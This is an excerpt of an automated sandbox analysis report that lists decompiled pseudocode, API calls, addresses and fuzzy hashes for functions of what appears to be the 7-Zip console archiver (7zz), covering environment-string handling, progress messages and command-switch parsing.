                                                                                                                                    0x00470b7a
                                                                                                                                    0x00470b7e
                                                                                                                                    0x00470b8f
                                                                                                                                    0x00470b95
                                                                                                                                    0x00470b9b
                                                                                                                                    0x00470b9b
                                                                                                                                    0x00470b9f
                                                                                                                                    0x00470b9f
                                                                                                                                    0x00470b7e
                                                                                                                                    0x00470ba4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00470b44
                                                                                                                                    0x00470b44
                                                                                                                                    0x00470b44
                                                                                                                                    0x00470b45
                                                                                                                                    0x00470b46
                                                                                                                                    0x00470b4c
                                                                                                                                    0x00470b4d
                                                                                                                                    0x00000000
                                                                                                                                    0x00470b44
                                                                                                                                    0x00470b33
                                                                                                                                    0x00470b37
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00470b37
                                                                                                                                    0x00470af3
                                                                                                                                    0x00470af7
                                                                                                                                    0x00470b0b
                                                                                                                                    0x00470b0f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00470b15
                                                                                                                                    0x00000000
                                                                                                                                    0x00470b15
                                                                                                                                    0x00470af9
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470AF1
                                                                                                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470B05
                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470B31
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046CFE1), ref: 00470B69
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046CFE1), ref: 00470B8B
                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,0046CFE1), ref: 00470BA4
                                                                                                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470BB7
                                                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00470BF5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1823725401-0
                                                                                                                                    • Opcode ID: d599979e6cfdd01caaf9bf144ab7e6e96aa32c1bff0767e80bd0dca3bd120fe9
                                                                                                                                    • Instruction ID: 27e12e20c1ea4b212add3b7eab65f77fdbffab05a40932be5c7e7487a2d6895d
                                                                                                                                    • Opcode Fuzzy Hash: d599979e6cfdd01caaf9bf144ab7e6e96aa32c1bff0767e80bd0dca3bd120fe9
                                                                                                                                    • Instruction Fuzzy Hash: 9C3105B2406255DFE7307FF89C848BBB6DCEA4571C711453BF559C3200EA29BE8182AE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406564 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                    			E00406564(void* __ecx) {
				void* _t15;
				void* _t18;
				void* _t29;
				void* _t31;

				L0046B890(0x473524, _t31);
				_push(__ecx);
				_t29 = __ecx;
				 *(_t31 - 0x10) = 0x490a88;
				EnterCriticalSection(0x490a88);
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				if( *((char*)(_t29 + 0x39)) == 0) {
					_t18 = _t29 + 8;
					if( *((char*)(_t31 + 0xc)) == 0) {
						_push("Compressing  ");
					} else {
						_push("Anti item    ");
					}
					E0040608D(_t18);
					_t13 =  *((intOrPtr*)(_t31 + 8));
					if( *((short*)( *((intOrPtr*)(_t31 + 8)))) == 0) {
						_t13 =  *0x48b344; // 0x48b388
					}
					E004060A5(_t18, _t13);
					if( *((char*)(_t29 + 0x38)) != 0) {
						E004060D4(_t18);
					}
					LeaveCriticalSection(0x490a88);
					_t15 = 0;
				} else {
					LeaveCriticalSection(0x490a88);
					_t15 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return _t15;
			}







                                                                                                                                    0x00406569
                                                                                                                                    0x0040656e
                                                                                                                                    0x00406576
                                                                                                                                    0x00406579
                                                                                                                                    0x0040657c
                                                                                                                                    0x00406582
                                                                                                                                    0x0040658a
                                                                                                                                    0x0040659c
                                                                                                                                    0x0040659f
                                                                                                                                    0x004065a8
                                                                                                                                    0x004065a1
                                                                                                                                    0x004065a1
                                                                                                                                    0x004065a1
                                                                                                                                    0x004065af
                                                                                                                                    0x004065b4
                                                                                                                                    0x004065bb
                                                                                                                                    0x004065bd
                                                                                                                                    0x004065bd
                                                                                                                                    0x004065c5
                                                                                                                                    0x004065ce
                                                                                                                                    0x004065d2
                                                                                                                                    0x004065d2
                                                                                                                                    0x004065d8
                                                                                                                                    0x004065de
                                                                                                                                    0x0040658c
                                                                                                                                    0x0040658d
                                                                                                                                    0x00406593
                                                                                                                                    0x00406593
                                                                                                                                    0x004065e6
                                                                                                                                    0x004065ee

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00406569
                                                                                                                                    • EnterCriticalSection.KERNEL32(00490A88), ref: 0040657C
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00490A88), ref: 0040658D
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00490A88), ref: 004065D8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$EnterH_prolog
                                                                                                                                    • String ID: Anti item $Compressing
                                                                                                                                    • API String ID: 2532973370-3992608634
                                                                                                                                    • Opcode ID: a4d77a2cb10ab5a3c8563fdb07b5886aea9a05d8824471b2f091ec8e7e6115ac
                                                                                                                                    • Instruction ID: 580c09916b0a3b3df052708d1afcafaf12a43b80893965563734f36f16cd3c83
                                                                                                                                    • Opcode Fuzzy Hash: a4d77a2cb10ab5a3c8563fdb07b5886aea9a05d8824471b2f091ec8e7e6115ac
                                                                                                                                    • Instruction Fuzzy Hash: 6D01B571A00244BFDB21EF25DC85B6EB7E4AF49314F01483FE047A65D1C7BC99548769
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004256CE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 374COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E004256CE(void* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t148;
				signed int _t149;
				intOrPtr _t153;
				signed int _t155;
				signed int _t158;
				intOrPtr* _t160;
				signed int* _t161;
				void* _t163;
				signed int _t178;
				signed int _t182;
				signed int* _t183;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t209;
				signed int _t213;
				intOrPtr* _t218;
				signed int _t220;
				void* _t223;
				intOrPtr _t236;
				signed int _t237;
				void* _t273;
				signed int* _t299;
				intOrPtr _t306;
				intOrPtr _t307;
				signed int _t313;
				signed int _t315;
				void* _t316;

				L0046B890(E004765A8, _t316);
				_t311 = __ecx;
				L00403532(_t316 - 0x20,  *((intOrPtr*)(_t316 + 8)));
				_t305 = 0;
				 *((intOrPtr*)(_t316 - 4)) = 0;
				L00407ED0( *((intOrPtr*)(_t316 - 0x20)));
				if( *(_t316 - 0x1c) != 0) {
					_t228 =  *((intOrPtr*)(_t316 - 0x20));
					_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t316 - 0x20))));
					__eflags = _t148 - 0x58;
					if(_t148 != 0x58) {
						__eflags = _t148 - 0x53;
						if(_t148 != 0x53) {
							_t149 = E00408053(_t228, L"CRC");
							__eflags = _t149;
							if(_t149 != 0) {
								_t220 = E004263BA(_t316 - 0x20, _t316 - 0x10);
								L004072C9(_t316 - 0x20, _t316 - 0x2c, _t220);
								__eflags = _t220;
								 *((char*)(_t316 - 4)) = 1;
								if(_t220 != 0) {
									L42:
									__eflags =  *(_t316 - 0x10) - 0x2710;
									if( *(_t316 - 0x10) <= 0x2710) {
										_t153 =  *((intOrPtr*)(_t311 + 0x44));
										__eflags =  *(_t316 - 0x10) - _t153;
										if( *(_t316 - 0x10) >= _t153) {
											_t306 =  *((intOrPtr*)(_t311 + 0x10));
											 *(_t316 - 0x10) =  *(_t316 - 0x10) - _t153;
											__eflags = _t306 -  *(_t316 - 0x10);
											if(_t306 >  *(_t316 - 0x10)) {
												L49:
												_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t311 + 0x14)) +  *(_t316 - 0x10) * 4));
												__eflags =  *(_t316 - 0x28);
												 *((intOrPtr*)(_t316 - 0x14)) = _t307;
												if( *(_t316 - 0x28) != 0) {
													_t155 = E00425B6E(_t316 - 0x2c);
													__eflags = _t155;
													if(_t155 < 0) {
														L60:
														E00407A18( *((intOrPtr*)(_t316 - 0x2c)));
														E00407A18( *((intOrPtr*)(_t316 - 0x20)));
														_t158 = 0x80070057;
														goto L73;
													}
													 *((short*)(_t316 - 0x48)) = 0;
													 *((short*)(_t316 - 0x46)) = 0;
													_t160 = 0x48c9b0 + (_t155 + _t155 * 2) * 4;
													_t236 =  *_t160;
													 *((char*)(_t316 - 4)) = 7;
													__eflags = _t236 - 4;
													 *((intOrPtr*)(_t316 - 0x50)) = _t236;
													if(_t236 == 4) {
														L61:
														_t161 =  *(_t160 + 8);
														_t237 = 0;
														__eflags = 0;
														while(1) {
															__eflags =  *_t161;
															if( *_t161 == 0) {
																break;
															}
															_t237 = _t237 + 1;
															_t161 =  &(_t161[0]);
														}
														_t163 = L004072C9(_t316 - 0x2c, _t316 - 0x38, _t237);
														_push(_t316 + 8);
														 *((char*)(_t316 - 4)) = 8;
														_t305 = E00426261(_t163,  *(_t316 + 0xc), _t311);
														 *((char*)(_t316 - 4)) = 7;
														E00407A18( *((intOrPtr*)(_t316 - 0x38)));
														__eflags = _t305;
														if(_t305 == 0) {
															E0040C1A0(_t316 - 0x48,  *((intOrPtr*)(_t316 + 8)));
															__eflags =  *(_t316 - 0x10) -  *((intOrPtr*)(_t311 + 0x50));
															if( *(_t316 - 0x10) <=  *((intOrPtr*)(_t311 + 0x50))) {
																 *((intOrPtr*)(_t311 + 0x4c)) =  *((intOrPtr*)(_t316 + 8));
															}
															L69:
															_push(_t316 - 0x50);
															E00425C04( *((intOrPtr*)(_t316 - 0x14)));
															 *((char*)(_t316 - 4)) = 1;
															E0040C20F(_t316 - 0x48);
															L70:
															_t313 = 0;
															__eflags = 0;
															L71:
															E00407A18( *((intOrPtr*)(_t316 - 0x2c)));
															goto L72;
														}
														 *((char*)(_t316 - 4)) = 1;
														E0040C20F(_t316 - 0x48);
														L66:
														E00407A18( *((intOrPtr*)(_t316 - 0x2c)));
														E00407A18( *((intOrPtr*)(_t316 - 0x20)));
														_t158 = _t305;
														goto L73;
													}
													__eflags = _t236 - 1;
													if(_t236 == 1) {
														goto L61;
													}
													__eflags = _t236 - 2;
													if(_t236 == 2) {
														goto L61;
													}
													_t178 = E0042518A(_t316 - 0x2c);
													__eflags = _t178;
													if(_t178 < 0) {
														L59:
														 *((char*)(_t316 - 4)) = 1;
														E0040C20F(_t316 - 0x48);
														goto L60;
													}
													_t180 = _t178 + _t178 * 2;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													 *((intOrPtr*)(_t316 - 0x50)) =  *((intOrPtr*)(0x48c9b0 + (_t178 + _t178 * 2) * 4));
													asm("movsd");
													_t182 = E00425124( *((intOrPtr*)(0x48c9b0 + _t180 * 4 + 4)), _t316 - 0x48);
													__eflags = _t182;
													if(_t182 != 0) {
														goto L69;
													}
													goto L59;
												}
												_t183 =  *(_t316 + 0xc);
												__eflags =  *_t183 - 8;
												if( *_t183 != 8) {
													goto L45;
												}
												L00403532(_t316 - 0x38, _t183[2]);
												_push(_t316 - 0x38);
												_push(_t307);
												 *((char*)(_t316 - 4)) = 6;
												_t313 = E004251BA(_t311, __eflags);
												E00407A18( *((intOrPtr*)(_t316 - 0x38)));
												__eflags = _t313;
												if(_t313 == 0) {
													goto L70;
												}
												goto L71;
											}
											_t223 = _t311 + 8;
											do {
												E00405B9F(_t316 - 0x58);
												 *((intOrPtr*)(_t316 - 0x58)) = 0x47b178;
												 *((char*)(_t316 - 4)) = 4;
												L0040351A(_t316 - 0x44);
												_push(_t316 - 0x58);
												 *((char*)(_t316 - 4)) = 5;
												E00425C5B(_t223, _t306);
												 *((char*)(_t316 - 4)) = 1;
												L00422D4A(_t316 - 0x58);
												_t306 = _t306 + 1;
												__eflags = _t306 -  *(_t316 - 0x10);
											} while (_t306 <=  *(_t316 - 0x10));
											goto L49;
										}
										L45:
										_t313 = 0x80070057;
										goto L71;
									}
									_t313 = 0x80004005;
									goto L71;
								}
								L00407399(_t316 - 0x20, _t316 - 0x38, 2);
								 *((char*)(_t316 - 4)) = 2;
								_t195 = E0040807A(0x48c4a8);
								__eflags = _t195;
								 *((char*)(_t316 - 4)) = 1;
								E00407A18( *((intOrPtr*)(_t316 - 0x38)));
								__eflags = _t220 & 0xffffff00 | _t195 == 0x00000000;
								if((_t220 & 0xffffff00 | _t195 == 0x00000000) == 0) {
									_t197 = E0040807A(L"RSFX");
									__eflags = _t197;
									if(_t197 != 0) {
										_t198 = E0040807A("F");
										__eflags = _t198;
										if(_t198 != 0) {
											_t199 = E0040807A(L"HC");
											__eflags = _t199;
											if(_t199 != 0) {
												_t200 = E0040807A(L"HCF");
												__eflags = _t200;
												if(_t200 != 0) {
													_t201 = E0040807A(L"HE");
													__eflags = _t201;
													if(_t201 != 0) {
														_t202 = E0040807A(L"TC");
														__eflags = _t202;
														if(_t202 != 0) {
															_t203 = E0040807A(L"TA");
															__eflags = _t203;
															if(_t203 != 0) {
																_t204 = E0040807A(L"TM");
																__eflags = _t204;
																if(_t204 != 0) {
																	_t205 = E0040807A(0x48bb98);
																	__eflags = _t205;
																	if(_t205 != 0) {
																		 *(_t316 - 0x10) = 0;
																		goto L42;
																	}
																	_t299 =  *(_t316 + 0xc);
																	_t273 = _t311 + 0x40;
																	L34:
																	_t206 = E0042633E(_t273, _t299);
																	L30:
																	_t313 = _t206;
																	goto L71;
																}
																_t299 =  *(_t316 + 0xc);
																_t273 = _t311 + 0x37;
																goto L34;
															}
															_t299 =  *(_t316 + 0xc);
															_t273 = _t311 + 0x36;
															goto L34;
														}
														_t299 =  *(_t316 + 0xc);
														_t273 = _t311 + 0x35;
														goto L34;
													}
													_t206 = E0042633E(_t311 + 0x34,  *(_t316 + 0xc));
													__eflags = _t206;
													if(_t206 == 0) {
														 *((char*)(_t311 + 0x33)) = 1;
														goto L70;
													}
													goto L30;
												}
												 *((char*)(_t316 + 0xb)) = 1;
												_t207 = E0042633E(_t316 + 0xb,  *(_t316 + 0xc));
												__eflags = _t207;
												if(_t207 == 0) {
													__eflags =  *((char*)(_t316 + 0xb));
													if( *((char*)(_t316 + 0xb)) == 0) {
														_t305 = 0x80070057;
													}
												} else {
													_t305 = _t207;
												}
												goto L66;
											}
											_t299 =  *(_t316 + 0xc);
											_t273 = _t311 + 0x32;
											goto L34;
										}
										_t299 =  *(_t316 + 0xc);
										_t273 = _t311 + 0x38;
										goto L34;
									}
									_t299 =  *(_t316 + 0xc);
									_t273 = _t311 + 0x1c;
									goto L34;
								}
								_t209 = L004072C9(_t316 - 0x20, _t316 - 0x38, 2);
								 *((char*)(_t316 - 4)) = 3;
								_t313 = E004263EB(_t209,  *(_t316 + 0xc),  *((intOrPtr*)(_t311 + 0x48)), _t311);
								E00407A18( *((intOrPtr*)(_t316 - 0x38)));
								__eflags = _t313;
								if(_t313 != 0) {
									goto L71;
								}
								goto L70;
							}
							_t315 = __ecx + 4;
							__eflags = _t315;
							 *_t315 = 4;
							L004075A5(_t316 - 0x20, 0, 3);
							_push(_t315);
							goto L12;
						}
						L004075A5(_t316 - 0x20, 0, 1);
						__eflags =  *(_t316 - 0x1c);
						if( *(_t316 - 0x1c) != 0) {
							__eflags =  *( *(_t316 + 0xc));
							if( *( *(_t316 + 0xc)) != 0) {
								goto L1;
							}
							_push(_t316 - 0x20);
							_t213 = E0042547B(__ecx);
						} else {
							_push( *(_t316 + 0xc));
							_t213 = E00425585(__ecx);
						}
						goto L7;
					} else {
						L004075A5(_t316 - 0x20, 0, 1);
						_t218 = __ecx + 0x3c;
						_push(_t218);
						 *_t218 = 9;
						L12:
						_t213 = E00426145(_t316 - 0x20,  *(_t316 + 0xc));
						L7:
						_t313 = _t213;
						L72:
						E00407A18( *((intOrPtr*)(_t316 - 0x20)));
						_t158 = _t313;
						L73:
						 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
						return _t158;
					}
				}
				L1:
				_t313 = 0x80070057;
				goto L72;
			}










































                                                                                                                                    0x004256d3
                                                                                                                                    0x004256de
                                                                                                                                    0x004256e6
                                                                                                                                    0x004256ee
                                                                                                                                    0x004256f0
                                                                                                                                    0x004256f3
                                                                                                                                    0x004256fb
                                                                                                                                    0x00425707
                                                                                                                                    0x0042570a
                                                                                                                                    0x0042570d
                                                                                                                                    0x00425711
                                                                                                                                    0x0042572a
                                                                                                                                    0x0042572e
                                                                                                                                    0x0042576b
                                                                                                                                    0x00425770
                                                                                                                                    0x00425772
                                                                                                                                    0x004257a1
                                                                                                                                    0x004257ab
                                                                                                                                    0x004257b0
                                                                                                                                    0x004257b2
                                                                                                                                    0x004257b6
                                                                                                                                    0x00425957
                                                                                                                                    0x00425957
                                                                                                                                    0x0042595e
                                                                                                                                    0x0042596a
                                                                                                                                    0x0042596d
                                                                                                                                    0x00425970
                                                                                                                                    0x0042597c
                                                                                                                                    0x0042597f
                                                                                                                                    0x00425982
                                                                                                                                    0x00425985
                                                                                                                                    0x004259c6
                                                                                                                                    0x004259ce
                                                                                                                                    0x004259d1
                                                                                                                                    0x004259d4
                                                                                                                                    0x004259d7
                                                                                                                                    0x00425a18
                                                                                                                                    0x00425a1d
                                                                                                                                    0x00425a1f
                                                                                                                                    0x00425a97
                                                                                                                                    0x00425a9a
                                                                                                                                    0x00425aa2
                                                                                                                                    0x00425aa8
                                                                                                                                    0x00000000
                                                                                                                                    0x00425aad
                                                                                                                                    0x00425a24
                                                                                                                                    0x00425a28
                                                                                                                                    0x00425a2c
                                                                                                                                    0x00425a33
                                                                                                                                    0x00425a35
                                                                                                                                    0x00425a39
                                                                                                                                    0x00425a3c
                                                                                                                                    0x00425a3f
                                                                                                                                    0x00425ab3
                                                                                                                                    0x00425ab3
                                                                                                                                    0x00425ab6
                                                                                                                                    0x00425ab6
                                                                                                                                    0x00425ab8
                                                                                                                                    0x00425ab8
                                                                                                                                    0x00425abb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00425abd
                                                                                                                                    0x00425abf
                                                                                                                                    0x00425abf
                                                                                                                                    0x00425aca
                                                                                                                                    0x00425ad5
                                                                                                                                    0x00425ad8
                                                                                                                                    0x00425ae4
                                                                                                                                    0x00425ae6
                                                                                                                                    0x00425aea
                                                                                                                                    0x00425aef
                                                                                                                                    0x00425af2
                                                                                                                                    0x00425b1c
                                                                                                                                    0x00425b24
                                                                                                                                    0x00425b27
                                                                                                                                    0x00425b2c
                                                                                                                                    0x00425b2c
                                                                                                                                    0x00425b2f
                                                                                                                                    0x00425b35
                                                                                                                                    0x00425b36
                                                                                                                                    0x00425b3e
                                                                                                                                    0x00425b42
                                                                                                                                    0x00425b47
                                                                                                                                    0x00425b47
                                                                                                                                    0x00425b47
                                                                                                                                    0x00425b49
                                                                                                                                    0x00425b4c
                                                                                                                                    0x00000000
                                                                                                                                    0x00425b51
                                                                                                                                    0x00425af7
                                                                                                                                    0x00425afb
                                                                                                                                    0x00425b00
                                                                                                                                    0x00425b03
                                                                                                                                    0x00425b0b
                                                                                                                                    0x00425b11
                                                                                                                                    0x00000000
                                                                                                                                    0x00425b13
                                                                                                                                    0x00425a41
                                                                                                                                    0x00425a44
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00425a46
                                                                                                                                    0x00425a49
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00425a4e
                                                                                                                                    0x00425a53
                                                                                                                                    0x00425a55
                                                                                                                                    0x00425a8b
                                                                                                                                    0x00425a8e
                                                                                                                                    0x00425a92
                                                                                                                                    0x00000000
                                                                                                                                    0x00425a92
                                                                                                                                    0x00425a5f
                                                                                                                                    0x00425a62
                                                                                                                                    0x00425a71
                                                                                                                                    0x00425a72
                                                                                                                                    0x00425a73
                                                                                                                                    0x00425a7d
                                                                                                                                    0x00425a7e
                                                                                                                                    0x00425a83
                                                                                                                                    0x00425a85
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00425a85
                                                                                                                                    0x004259d9
                                                                                                                                    0x004259dc
                                                                                                                                    0x004259e0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004259e8
                                                                                                                                    0x004259f2
                                                                                                                                    0x004259f3
                                                                                                                                    0x004259f4
                                                                                                                                    0x00425a00
                                                                                                                                    0x00425a02
                                                                                                                                    0x00425a07
                                                                                                                                    0x00425a0a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00425a10
                                                                                                                                    0x00425987
                                                                                                                                    0x0042598a
                                                                                                                                    0x0042598d
                                                                                                                                    0x00425992
                                                                                                                                    0x0042599c
                                                                                                                                    0x004259a0
                                                                                                                                    0x004259aa
                                                                                                                                    0x004259ab
                                                                                                                                    0x004259af
                                                                                                                                    0x004259b7
                                                                                                                                    0x004259bb
                                                                                                                                    0x004259c0
                                                                                                                                    0x004259c1
                                                                                                                                    0x004259c1
                                                                                                                                    0x00000000
                                                                                                                                    0x0042598a
                                                                                                                                    0x00425972
                                                                                                                                    0x00425972
                                                                                                                                    0x00000000
                                                                                                                                    0x00425972
                                                                                                                                    0x00425960
                                                                                                                                    0x00000000
                                                                                                                                    0x00425960
                                                                                                                                    0x004257c5
                                                                                                                                    0x004257d1
                                                                                                                                    0x004257d5
                                                                                                                                    0x004257dd
                                                                                                                                    0x004257e2
                                                                                                                                    0x004257e6
                                                                                                                                    0x004257eb
                                                                                                                                    0x004257ee
                                                                                                                                    0x00425830
                                                                                                                                    0x00425835
                                                                                                                                    0x00425837
                                                                                                                                    0x0042584c
                                                                                                                                    0x00425851
                                                                                                                                    0x00425853
                                                                                                                                    0x00425868
                                                                                                                                    0x0042586d
                                                                                                                                    0x0042586f
                                                                                                                                    0x00425884
                                                                                                                                    0x00425889
                                                                                                                                    0x0042588b
                                                                                                                                    0x004258c3
                                                                                                                                    0x004258c8
                                                                                                                                    0x004258ca
                                                                                                                                    0x004258f3
                                                                                                                                    0x004258f8
                                                                                                                                    0x004258fa
                                                                                                                                    0x00425911
                                                                                                                                    0x00425916
                                                                                                                                    0x00425918
                                                                                                                                    0x0042592a
                                                                                                                                    0x0042592f
                                                                                                                                    0x00425931
                                                                                                                                    0x00425943
                                                                                                                                    0x00425948
                                                                                                                                    0x0042594a
                                                                                                                                    0x00425954
                                                                                                                                    0x00000000
                                                                                                                                    0x00425954
                                                                                                                                    0x0042594c
                                                                                                                                    0x0042594f
                                                                                                                                    0x00425902
                                                                                                                                    0x00425902
                                                                                                                                    0x004258db
                                                                                                                                    0x004258db
                                                                                                                                    0x00000000
                                                                                                                                    0x004258db
                                                                                                                                    0x00425933
                                                                                                                                    0x00425936
                                                                                                                                    0x00000000
                                                                                                                                    0x00425936
                                                                                                                                    0x0042591a
                                                                                                                                    0x0042591d
                                                                                                                                    0x00000000
                                                                                                                                    0x0042591d
                                                                                                                                    0x004258fc
                                                                                                                                    0x004258ff
                                                                                                                                    0x00000000
                                                                                                                                    0x004258ff
                                                                                                                                    0x004258d2
                                                                                                                                    0x004258d7
                                                                                                                                    0x004258d9
                                                                                                                                    0x004258e2
                                                                                                                                    0x00000000
                                                                                                                                    0x004258e2
                                                                                                                                    0x00000000
                                                                                                                                    0x004258d9
                                                                                                                                    0x00425893
                                                                                                                                    0x00425897
                                                                                                                                    0x0042589c
                                                                                                                                    0x0042589e
                                                                                                                                    0x004258a7
                                                                                                                                    0x004258ab
                                                                                                                                    0x004258b1
                                                                                                                                    0x004258b1
                                                                                                                                    0x004258a0
                                                                                                                                    0x004258a0
                                                                                                                                    0x004258a0
                                                                                                                                    0x00000000
                                                                                                                                    0x0042589e
                                                                                                                                    0x00425871
                                                                                                                                    0x00425874
                                                                                                                                    0x00000000
                                                                                                                                    0x00425874
                                                                                                                                    0x00425855
                                                                                                                                    0x00425858
                                                                                                                                    0x00000000
                                                                                                                                    0x00425858
                                                                                                                                    0x00425839
                                                                                                                                    0x0042583c
                                                                                                                                    0x00000000
                                                                                                                                    0x0042583c
                                                                                                                                    0x004257f9
                                                                                                                                    0x00425807
                                                                                                                                    0x00425813
                                                                                                                                    0x00425815
                                                                                                                                    0x0042581a
                                                                                                                                    0x0042581d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00425823
                                                                                                                                    0x00425774
                                                                                                                                    0x00425774
                                                                                                                                    0x0042577d
                                                                                                                                    0x00425783
                                                                                                                                    0x00425788
                                                                                                                                    0x00000000
                                                                                                                                    0x00425788
                                                                                                                                    0x00425736
                                                                                                                                    0x0042573b
                                                                                                                                    0x0042573e
                                                                                                                                    0x00425754
                                                                                                                                    0x00425757
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042575e
                                                                                                                                    0x0042575f
                                                                                                                                    0x00425740
                                                                                                                                    0x00425740
                                                                                                                                    0x00425745
                                                                                                                                    0x00425745
                                                                                                                                    0x00000000
                                                                                                                                    0x00425713
                                                                                                                                    0x00425719
                                                                                                                                    0x0042571e
                                                                                                                                    0x00425721
                                                                                                                                    0x00425722
                                                                                                                                    0x00425789
                                                                                                                                    0x0042578f
                                                                                                                                    0x0042574a
                                                                                                                                    0x0042574a
                                                                                                                                    0x00425b52
                                                                                                                                    0x00425b55
                                                                                                                                    0x00425b5b
                                                                                                                                    0x00425b5d
                                                                                                                                    0x00425b62
                                                                                                                                    0x00425b6b
                                                                                                                                    0x00425b6b
                                                                                                                                    0x00425711
                                                                                                                                    0x004256fd
                                                                                                                                    0x004256fd
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004256D3
                                                                                                                                      • Part of subcall function 00407ED0: __EH_prolog.LIBCMT ref: 00407ED5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
